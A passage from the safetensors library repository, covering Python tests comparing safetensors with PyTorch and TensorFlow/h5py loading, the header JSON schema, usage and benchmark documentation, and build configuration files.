252 | self.assertIn("""Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception))
253 |
254 | def test_difference_torch_odd(self):
255 | model = NoSharedModel()
256 | a = model.a.weight
257 | b = model.b.weight
258 | self.assertNotEqual(a.data_ptr(), b.data_ptr())
259 | torch.save(model.state_dict(), "tmp3.bin")
260 |
261 | model2 = Model()
262 | self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}])
263 | # Torch will affect either `b` or `a` to the shared tensor in the `model2`
264 | model2.load_state_dict(torch.load("tmp3.bin"))
265 |
266 | # XXX: model2 uses only the B weight not the A weight anymore.
267 | self.assertFalse(torch.allclose(model2.a.weight, model.a.weight))
268 | torch.testing.assert_close(model2.a.weight, model.b.weight)
269 | self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}])
270 |
271 | # Everything is saved as-is
272 | save_model(model, "tmp3.safetensors")
273 | # safetensors will yell that there were 2 tensors on disk, while
274 | # the models expects only 1 tensor since both are shared.
275 | with self.assertRaises(RuntimeError) as ctx:
276 | load_model(model2, "tmp3.safetensors")
277 | # Safetensors properly warns the user that some ke
278 | self.assertIn("""Unexpected key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception))
279 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_tf_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import h5py
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import safe_open
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(f, tensors=None, prefix=""):
12 | if tensors is None:
13 | tensors = {}
14 | for k in f.keys():
15 | if isinstance(f[k], h5py._hl.dataset.Dataset):
16 | key = k if not prefix else f"{prefix}_{k}"
17 | tensors[key] = tf.convert_to_tensor(np.array(f[k]))
18 | else:
19 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
20 | return tensors
21 |
22 |
23 | def _save(f, tensors, prefix=""):
24 | for name, tensor in tensors.items():
25 | tensor = tensor.numpy()
26 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
27 | dset[:] = tensor
28 |
29 |
30 | class SafeTestCase(unittest.TestCase):
31 | def setUp(self):
32 | data = {
33 | "test": tf.zeros((1024, 1024), dtype=tf.float32),
34 | "test2": tf.zeros((1024, 1024), dtype=tf.float32),
35 | "test3": tf.zeros((1024, 1024), dtype=tf.float32),
36 | }
37 | self.tf_filename = "./tests/data/tf_load.h5"
38 | self.sf_filename = "./tests/data/tf_load.safetensors"
39 |
40 | with h5py.File(self.tf_filename, "w") as f:
41 | _save(f, data)
42 | save_file(data, self.sf_filename)
43 |
44 | def test_zero_sized(self):
45 | data = {
46 | "test": tf.zeros((2, 0), dtype=tf.float32),
47 | }
48 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
49 | save_file(data.copy(), local)
50 | reloaded = load_file(local)
51 | # Empty tensor != empty tensor on numpy, so comparing shapes
52 | # instead
53 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
54 |
55 | def test_deserialization_safe(self):
56 | weights = load_file(self.sf_filename)
57 |
58 | with h5py.File(self.tf_filename, "r") as f:
59 | tf_weights = _load(f)
60 |
61 | for k, v in weights.items():
62 | tv = tf_weights[k]
63 | self.assertTrue(np.allclose(v, tv))
64 |
65 | def test_bfloat16(self):
66 | data = {
67 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16),
68 | }
69 | save_file(data, self.sf_filename)
70 | weights = {}
71 | with safe_open(self.sf_filename, framework="tf") as f:
72 | for k in f.keys():
73 | weights[k] = f.get_tensor(k)
74 |
75 | for k, v in weights.items():
76 | tv = data[k]
77 | self.assertTrue(tf.experimental.numpy.allclose(v, tv))
78 |
79 | def test_deserialization_safe_open(self):
80 | weights = {}
81 | with safe_open(self.sf_filename, framework="tf") as f:
82 | for k in f.keys():
83 | weights[k] = f.get_tensor(k)
84 |
85 | with h5py.File(self.tf_filename, "r") as f:
86 | tf_weights = _load(f)
87 |
88 | for k, v in weights.items():
89 | tv = tf_weights[k]
90 | self.assertTrue(np.allclose(v, tv))
91 |
--------------------------------------------------------------------------------
/codecov.yaml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/codecov.yml:
--------------------------------------------------------------------------------
1 | comment: false
2 |
--------------------------------------------------------------------------------
/docs/safetensors.schema.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://json-schema.org/draft/2020-12/schema",
3 | "title": "safetensors format header",
4 | "description": "Describes the structure of all the tensors and their metadata",
5 | "$defs": {
6 | "size_t": {
7 | "type": "integer",
8 | "minimum": 0,
9 | "maximum": 281474976710655,
10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)"
11 | },
12 | "Tensor": {
13 | "title": "Tensor",
14 | "description": "Describes the structure of one tensor",
15 | "type": "object",
16 | "additionalProperties": false,
17 | "properties": {
18 | "dtype": {
19 | "type": "string",
20 | "pattern": "([UIF])(8|16|32|64|128|256)",
21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits."
22 | },
23 | "shape": {
24 | "type": "array",
25 | "items": {
26 | "$ref": "#/$defs/size_t",
27 | "description": "Size of each dimension."
28 | }
29 | },
30 | "data_offsets": {
31 | "type": "array",
32 | "prefixItems": [
33 | {
34 | "$ref": "#/$defs/size_t",
35 | "description": "Start offset of the array. "
36 | },
37 | {
38 | "$ref": "#/$defs/size_t",
39 | "description": "End offset of the array. Equal to the previous item + array size."
40 | }
41 | ]
42 | }
43 | },
44 | "required": [
45 | "data_offsets",
46 | "dtype",
47 | "shape"
48 | ]
49 | },
50 | "Metadata": {
51 | "type": "object",
52 | "additionalProperties": {"type": "string"},
53 | "title": "Metadata"
54 | }
55 | },
56 | "type": "object",
57 | "properties": {
58 | "__metadata__": {
59 | "description": "Arbitrary metadata",
60 | "$ref": "#/$defs/Metadata"
61 | }
62 | },
63 | "additionalProperties": {
64 | "$ref": "#/$defs/Tensor"
65 | }
66 | }
67 |
--------------------------------------------------------------------------------
/docs/source/_toctree.yml:
--------------------------------------------------------------------------------
1 | - sections:
2 | - local: index
3 | title: 🤗 Safetensors
4 | - local: speed
5 | title: Speed Comparison
6 | - local: torch_shared_tensors
7 | title: Tensor Sharing in Pytorch
8 | - local: metadata_parsing
9 | title: Metadata Parsing
10 | - local: convert-weights
11 | title: Convert weights to safetensors
12 | title: Getting started
13 | - sections:
14 | - local: api/torch
15 | title: Torch API
16 | - local: api/tensorflow
17 | title: Tensorflow API
18 | - local: api/paddle
19 | title: PaddlePaddle API
20 | - local: api/flax
21 | title: Flax API
22 | - local: api/numpy
23 | title: Numpy API
24 | title: API
25 |
--------------------------------------------------------------------------------
/docs/source/api/flax.mdx:
--------------------------------------------------------------------------------
1 | # Flax API
2 |
3 | [[autodoc]] safetensors.flax.load_file
4 | [[autodoc]] safetensors.flax.load
5 | [[autodoc]] safetensors.flax.save_file
6 | [[autodoc]] safetensors.flax.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/numpy.mdx:
--------------------------------------------------------------------------------
1 | # Numpy API
2 |
3 | [[autodoc]] safetensors.numpy.load_file
4 | [[autodoc]] safetensors.numpy.load
5 | [[autodoc]] safetensors.numpy.save_file
6 | [[autodoc]] safetensors.numpy.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/paddle.mdx:
--------------------------------------------------------------------------------
1 | # PaddlePaddle API
2 |
3 | [[autodoc]] safetensors.paddle.load_file
4 | [[autodoc]] safetensors.paddle.load
5 | [[autodoc]] safetensors.paddle.save_file
6 | [[autodoc]] safetensors.paddle.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/tensorflow.mdx:
--------------------------------------------------------------------------------
1 | # Tensorflow API
2 |
3 | [[autodoc]] safetensors.tensorflow.load_file
4 | [[autodoc]] safetensors.tensorflow.load
5 | [[autodoc]] safetensors.tensorflow.save_file
6 | [[autodoc]] safetensors.tensorflow.save
7 |
--------------------------------------------------------------------------------
/docs/source/api/torch.mdx:
--------------------------------------------------------------------------------
1 | # Torch API
2 |
3 | [[autodoc]] safetensors.torch.load_file
4 | [[autodoc]] safetensors.torch.load
5 | [[autodoc]] safetensors.torch.save_file
6 | [[autodoc]] safetensors.torch.save
7 | [[autodoc]] safetensors.torch.load_model
8 | [[autodoc]] safetensors.torch.save_model
9 |
--------------------------------------------------------------------------------
/docs/source/convert-weights.md:
--------------------------------------------------------------------------------
1 | # Convert weights to safetensors
2 |
3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensor` format, we recommend converting your weights to `.safetensors`.
4 |
5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), given your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository.
6 |
7 |
8 |
9 | For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights.
10 |
11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space.
12 |
13 |
14 |
--------------------------------------------------------------------------------
/docs/source/index.mdx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | # Safetensors
9 |
10 | Safetensors is a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). Safetensors is really [fast 🚀](./speed).
11 |
12 | ## Installation
13 |
14 | with pip:
15 | ```
16 | pip install safetensors
17 | ```
18 |
19 | with conda:
20 | ```
21 | conda install -c huggingface safetensors
22 | ```
23 |
24 | ## Usage
25 |
26 | ### Load tensors
27 |
28 | ```python
29 | from safetensors import safe_open
30 |
31 | tensors = {}
32 | with safe_open("model.safetensors", framework="pt", device=0) as f:
33 | for k in f.keys():
34 | tensors[k] = f.get_tensor(k)
35 | ```
36 |
37 | Loading only part of the tensors (interesting when running on multiple GPU)
38 |
39 | ```python
40 | from safetensors import safe_open
41 |
42 | tensors = {}
43 | with safe_open("model.safetensors", framework="pt", device=0) as f:
44 | tensor_slice = f.get_slice("embedding")
45 | vocab_size, hidden_dim = tensor_slice.get_shape()
46 | tensor = tensor_slice[:, :hidden_dim]
47 | ```
48 |
49 | ### Save tensors
50 |
51 | ```python
52 | import torch
53 | from safetensors.torch import save_file
54 |
55 | tensors = {
56 | "embedding": torch.zeros((2, 2)),
57 | "attention": torch.zeros((2, 3))
58 | }
59 | save_file(tensors, "model.safetensors")
60 | ```
61 |
62 | ## Format
63 |
64 | Let's say you have safetensors file named `model.safetensors`, then `model.safetensors` will have the following internal format:
65 |
66 |
67 |
68 |
69 |
70 | ## Featured Projects
71 |
72 | Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors:
73 |
74 | * [huggingface/transformers](https://github.com/huggingface/transformers)
75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx)
76 | * [huggingface/candle](https://github.com/huggingface/candle)
77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui)
78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537)
79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix)
80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI)
81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models)
82 | * [CivitAI](https://civitai.com/)
83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers)
84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx)
85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI)
86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui)
87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner)
88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP)
89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT)
90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry)
91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI)
92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE)
93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax)
94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic)
95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures)
96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors)
97 |
--------------------------------------------------------------------------------
/docs/source/metadata_parsing.mdx:
--------------------------------------------------------------------------------
1 | # Metadata Parsing
2 |
3 | Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests).
4 |
5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language.
6 |
7 | ## Example use case
8 |
9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights:
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 | ## Usage
22 |
23 |
24 |
25 |
26 | From [🤗 Hub](hf.co/models), you can get metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In this example python script below (you can use any language that has HTTP requests support), we are parsing metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors).
27 |
28 | ```python
29 | import requests # pip install requests
30 | import struct
31 |
32 | def parse_single_file(url):
33 | # Fetch the first 8 bytes of the file
34 | headers = {'Range': 'bytes=0-7'}
35 | response = requests.get(url, headers=headers)
36 | # Interpret the bytes as a little-endian unsigned 64-bit integer
37 | length_of_header = struct.unpack('
60 |
61 |
62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js)
63 |
64 | ```ts
65 | import { parseSafetensorsMetadata } from "@huggingface/hub";
66 |
67 | const info = await parseSafetensorsMetadata({
68 | repo: { type: "model", name: "bigscience/bloom" },
69 | });
70 |
71 | console.log(info)
72 | // {
73 | // sharded: true,
74 | // index: {
75 | // metadata: { total_size: 352494542848 },
76 | // weight_map: {
77 | // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors',
78 | // ...
79 | // }
80 | // },
81 | // headers: {
82 | // __metadata__: {'format': 'pt'},
83 | // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]},
84 | // ...
85 | // }
86 | // }
87 | ```
88 |
89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be:
90 |
91 | ```ts
92 | export type SafetensorsParseFromRepo =
93 | | {
94 | sharded: false;
95 | header: SafetensorsFileHeader;
96 | }
97 | | {
98 | sharded: true;
99 | index: SafetensorsIndexJson;
100 | headers: SafetensorsShardedHeaders;
101 | };
102 | ```
103 |
104 | where the underlying `types` are the following:
105 |
106 | ```ts
107 | type FileName = string;
108 |
109 | type TensorName = string;
110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL";
111 |
112 | interface TensorInfo {
113 | dtype: Dtype;
114 | shape: number[];
115 | data_offsets: [number, number];
116 | }
117 |
118 | type SafetensorsFileHeader = Record & {
119 | __metadata__: Record;
120 | };
121 |
122 | interface SafetensorsIndexJson {
123 | weight_map: Record;
124 | }
125 |
126 | export type SafetensorsShardedHeaders = Record;
127 | ```
128 |
129 |
130 |
131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata.
132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model.
133 | Depending on if the model is sharded or not, one or multiple safetensors files will be parsed.
134 |
135 | ```python
136 | >>> from huggingface_hub import get_safetensors_metadata
137 |
138 | # Parse repo with single weights file
139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m")
140 | >>> metadata
141 | SafetensorsRepoMetadata(
142 | metadata=None,
143 | sharded=False,
144 | weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...},
145 | files_metadata={'model.safetensors': SafetensorsFileMetadata(...)}
146 | )
147 | >>> metadata.files_metadata["model.safetensors"].metadata
148 | {'format': 'pt'}
149 |
150 | # Parse repo with sharded model (i.e. multiple weights files)
151 | >>> metadata = get_safetensors_metadata("bigscience/bloom")
152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s]
153 | >>> metadata
154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...})
155 | >>> len(metadata.files_metadata)
156 | 72 # All safetensors files have been fetched
157 |
158 | # Parse repo that is not a safetensors repo
159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5")
160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files.
161 | ```
162 |
163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata).
164 |
165 |
166 |
167 |
168 | ## Example output
169 |
170 | For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage.
171 |
172 | model | safetensors | params
173 | --- | --- | ---
174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 }
175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 }
176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 }
177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 }
178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 }
179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 }
180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 }
181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 }
182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 }
183 |
--------------------------------------------------------------------------------
/docs/source/speed.mdx:
--------------------------------------------------------------------------------
1 | # Speed Comparison
2 |
3 |
4 |
9 |
10 |
11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has GPU or you have selected `GPU runtime` if you are using Google Colab.
12 |
13 | Before you begin, make sure you have all the necessary libraries installed:
14 |
15 | ```bash
16 | pip install safetensors huggingface_hub torch
17 | ```
18 |
19 | Let's start by importing all the packages that will be used:
20 |
21 | ```py
22 | >>> import os
23 | >>> import datetime
24 | >>> from huggingface_hub import hf_hub_download
25 | >>> from safetensors.torch import load_file
26 | >>> import torch
27 | ```
28 |
29 | Download safetensors & torch weights for gpt2:
30 |
31 | ```py
32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors")
33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin")
34 | ```
35 |
36 | ### CPU benchmark
37 |
38 | ```py
39 | >>> start_st = datetime.datetime.now()
40 | >>> weights = load_file(sf_filename, device="cpu")
41 | >>> load_time_st = datetime.datetime.now() - start_st
42 | >>> print(f"Loaded safetensors {load_time_st}")
43 |
44 | >>> start_pt = datetime.datetime.now()
45 | >>> weights = torch.load(pt_filename, map_location="cpu")
46 | >>> load_time_pt = datetime.datetime.now() - start_pt
47 | >>> print(f"Loaded pytorch {load_time_pt}")
48 |
49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
50 | Loaded safetensors 0:00:00.004015
51 | Loaded pytorch 0:00:00.307460
52 | on CPU, safetensors is faster than pytorch by: 76.6 X
53 | ```
54 |
55 | This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do on [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282).
56 | The currently shown speedup was gotten on:
57 | * OS: Ubuntu 18.04.6 LTS
58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz
59 |
60 |
61 | ### GPU benchmark
62 |
63 | ```py
64 | >>> # This is required because this feature hasn't been fully verified yet, but
65 | >>> # it's been tested on many different environments
66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1"
67 |
68 | >>> # CUDA startup out of the measurement
69 | >>> torch.zeros((2, 2)).cuda()
70 |
71 | >>> start_st = datetime.datetime.now()
72 | >>> weights = load_file(sf_filename, device="cuda:0")
73 | >>> load_time_st = datetime.datetime.now() - start_st
74 | >>> print(f"Loaded safetensors {load_time_st}")
75 |
76 | >>> start_pt = datetime.datetime.now()
77 | >>> weights = torch.load(pt_filename, map_location="cuda:0")
78 | >>> load_time_pt = datetime.datetime.now() - start_pt
79 | >>> print(f"Loaded pytorch {load_time_pt}")
80 |
81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
82 | Loaded safetensors 0:00:00.165206
83 | Loaded pytorch 0:00:00.353889
84 | on GPU, safetensors is faster than pytorch by: 2.1 X
85 | ```
86 |
87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating the tensor empty with pytorch and calling `cudaMemcpy` directly to move the tensor directly on the GPU.
88 | The currently shown speedup was gotten on:
89 | * OS: Ubuntu 18.04.6 LTS.
90 | * GPU: Tesla T4
91 | * Driver Version: 460.32.03
92 | * CUDA Version: 11.2
93 |
--------------------------------------------------------------------------------
/docs/source/torch_shared_tensors.mdx:
--------------------------------------------------------------------------------
1 | # Torch shared tensors
2 |
3 |
4 | ## TL;DR
5 |
6 | Using specific functions, which should work in most cases for you.
7 | This is not without side effects.
8 |
9 | ```python
10 | from safetensors.torch import load_model, save_model
11 |
12 | save_model(model, "model.safetensors")
13 | # Instead of save_file(model.state_dict(), "model.safetensors")
14 |
15 | load_model(model, "model.safetensors")
16 | # Instead of model.load_state_dict(load_file("model.safetensors"))
17 | ```
18 |
19 | ## What are shared tensors ?
20 |
21 | Pytorch uses shared tensors for some computation.
22 | This is extremely interesting to reduce memory usage in general.
23 |
24 | One very classic use case is in transformers the `embeddings` are shared with
25 | `lm_head`. By using the same matrix, the model uses less parameters, and gradients
26 | flow much better to the `embeddings` (which is the start of the model, so they don't
27 | flow easily there, whereas `lm_head` is at the tail of the model, so gradients are
28 | extremely good over there, since they are the same tensors, they both benefit)
29 |
30 |
31 | ```python
32 | from torch import nn
33 |
34 | class Model(nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = nn.Linear(100, 100)
38 | self.b = self.a
39 |
40 | def forward(self, x):
41 | return self.b(self.a(x))
42 |
43 |
44 | model = Model()
45 | print(model.state_dict())
46 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias'])
47 | torch.save(model.state_dict(), "model.bin")
48 | # This file is now 41k instead of ~80k, because A and B are the same weight hence only 1 is saved on disk with both `a` and `b` pointing to the same buffer
49 | ```
50 |
51 | ## Why are shared tensors not saved in `safetensors` ?
52 |
53 | Multiple reasons for that:
54 |
55 | - *Not all frameworks support them* for instance `tensorflow` does not.
56 | So if someone saves shared tensors in torch, there is no way to
57 | load them in a similar fashion so we could not keep the same `Dict[str, Tensor]`
58 | API.
59 | - *It makes lazy loading very quickly.*
60 | Lazy loading is the ability to load only some tensors, or part of tensors for
61 | a given file. This is trivial to do without sharing tensors but with tensor sharing
62 |
63 | ```python
64 | with safe_open("model.safetensors", framework="pt") as f:
65 | a = f.get_tensor("a")
66 | b = f.get_tensor("b")
67 | ```
68 |
69 | Now it's impossible with this given code to "reshare" buffers after the fact.
70 | Once we give the `a` tensor we have no way to give back the same memory when
71 | you ask for `b`. (In this particular example we could keep track of given buffers
72 | but this is not the case in general, since you could do arbitrary work with `a`
73 | like sending it to another device before asking for `b`)
74 | - *It can lead to much larger file than necessary*.
75 | If you are saving a shared tensor which is only a fraction of a larger tensor,
76 | then saving it with pytorch leads to saving the entire buffer instead of saving
77 | just what is needed.
78 |
79 | ```python
80 | a = torch.zeros((100, 100))
81 | b = a[:1, :]
82 | torch.save({"b": b}, "model.bin")
83 | # File is 41k instead of the expected 400 bytes
84 | # In practice it could happen that you save several 10GB instead of 1GB.
85 | ```
86 |
87 | Now with all those reasons being mentioned, nothing is set in stone in there.
88 | Shared tensors do not cause unsafety, or denial of service potential, so this
89 | decision could be revisited if current workarounds are not satisfactory.
90 |
91 | ## How does it work ?
92 |
93 | The design is rather simple.
94 | We're going to look for all shared tensors, then looking for all tensors
95 | covering the entire buffer (there can be multiple such tensors).
96 | That gives us multiple names which can be saved, we simply choose the first one
97 |
98 | During `load_model`, we are loading a bit like `load_state_dict` does, except
99 | we're looking into the model itself, to check for shared buffers, and ignoring
100 | the "missed keys" which were actually covered by virtue of buffer sharing (they
101 | were properly loaded since there was a buffer that loaded under the hood).
102 | Every other error is raised as-is
103 |
104 | **Caveat**: This means we're dropping some keys within the file. meaning if you're
105 | checking for the keys saved on disk, you will see some "missing tensors" or if you're
106 | using `load_state_dict`. Unless we start supporting shared tensors directly in
107 | the format there's no real way around it.
108 |
--------------------------------------------------------------------------------
/flake.lock:
--------------------------------------------------------------------------------
1 | {
2 | "nodes": {
3 | "nixpkgs": {
4 | "locked": {
5 | "lastModified": 1730531603,
6 | "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=",
7 | "owner": "NixOS",
8 | "repo": "nixpkgs",
9 | "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d",
10 | "type": "github"
11 | },
12 | "original": {
13 | "owner": "NixOS",
14 | "ref": "nixos-unstable",
15 | "repo": "nixpkgs",
16 | "type": "github"
17 | }
18 | },
19 | "root": {
20 | "inputs": {
21 | "nixpkgs": "nixpkgs"
22 | }
23 | }
24 | },
25 | "root": "root",
26 | "version": 7
27 | }
28 |
--------------------------------------------------------------------------------
/flake.nix:
--------------------------------------------------------------------------------
1 | {
2 | inputs = {
3 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable";
4 | };
5 |
6 | outputs =
7 | { nixpkgs, ... }:
8 | let
9 | forAllSystems = nixpkgs.lib.genAttrs [
10 | "aarch64-linux"
11 | "x86_64-linux"
12 | "aarch64-darwin"
13 | ];
14 | in
15 | {
16 | devShells = forAllSystems (
17 | system:
18 | let
19 | pkgs = nixpkgs.legacyPackages.${system};
20 | in
21 | {
22 | default = pkgs.mkShell {
23 | buildInputs = with pkgs; [
24 | rustup
25 | python3Packages.python
26 | python3Packages.venvShellHook
27 | ];
28 | venvDir = "./.venv";
29 | postVenvCreation = ''
30 | unset SOURCE_DATE_EPOCH
31 | '';
32 | postShellHook = ''
33 | unset SOURCE_DATE_EPOCH
34 | '';
35 | LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib";
36 | };
37 |
38 | }
39 | );
40 | };
41 | }
42 |
--------------------------------------------------------------------------------
/safetensors/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors"
3 | version = "0.5.3-dev.0"
4 | edition = "2021"
5 | rust-version = "1.74"
6 | homepage = "https://github.com/huggingface/safetensors"
7 | repository = "https://github.com/huggingface/safetensors"
8 | documentation = "https://docs.rs/safetensors/"
9 | license = "Apache-2.0"
10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"]
11 | readme = "./README.md"
12 | description = """
13 | Provides functions to read and write safetensors which aim to be safer than
14 | their PyTorch counterpart.
15 | The format is 8 bytes which is an unsized int, being the size of a JSON header,
16 | the JSON header refers the `dtype` the `shape` and `data_offsets` which are the offsets
17 | for the values in the rest of the file.
18 | """
19 | exclude = [ "rust-toolchain", "target/*", "Cargo.lock"]
20 |
21 |
22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
23 |
24 | [dependencies]
25 | hashbrown = { version = "0.15.2", features = ["serde"], optional = true }
26 | serde = { version = "1.0", default-features = false, features = ["derive"] }
27 | serde_json = { version = "1.0", default-features = false }
28 |
29 | [dev-dependencies]
30 | criterion = "0.5"
31 | memmap2 = "0.9"
32 | proptest = "1.4"
33 |
34 | [features]
35 | default = ["std"]
36 | std = ["serde/default", "serde_json/default"]
37 | alloc = ["serde/alloc", "serde_json/alloc", "hashbrown"]
38 |
39 | [[bench]]
40 | name = "benchmark"
41 | harness = false
42 |
